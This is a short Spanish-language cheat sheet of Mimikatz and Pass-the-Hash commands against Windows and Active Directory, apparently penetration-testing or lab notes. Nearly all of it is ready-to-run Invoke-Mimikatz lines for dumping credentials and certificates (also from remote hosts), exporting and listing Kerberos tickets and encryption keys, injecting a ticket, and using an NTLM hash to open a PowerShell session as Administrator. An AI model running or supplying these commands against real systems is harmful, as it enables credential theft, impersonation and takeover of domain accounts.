Mimikatz & PassTheHash

Mimikatz

Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde su repositorio.

Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).

• Obtener credenciales en la máquina local

Invoke-Mimikatz -DumpCreds

• Obtener certificados en la máquina local

Invoke-Mimikatz –DumpCerts

• Obtener credenciales de varias máquinas remotas

Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

• Exportar todos los tickets de la máquina

Invoke-Mimikatz -Command '"kerberos::list /export"'

• Listar los tickets de los usuarios autenticados en la máquina local

Invoke-Mimikatz –Command '"sekurlsa::tickets"'

• Listar claves de cifrado de Kerberos

Invoke-Mimikatz –Command '"sekurlsa::ekeys"'

• Inyectar ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Pass The Hash (PTH)

Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'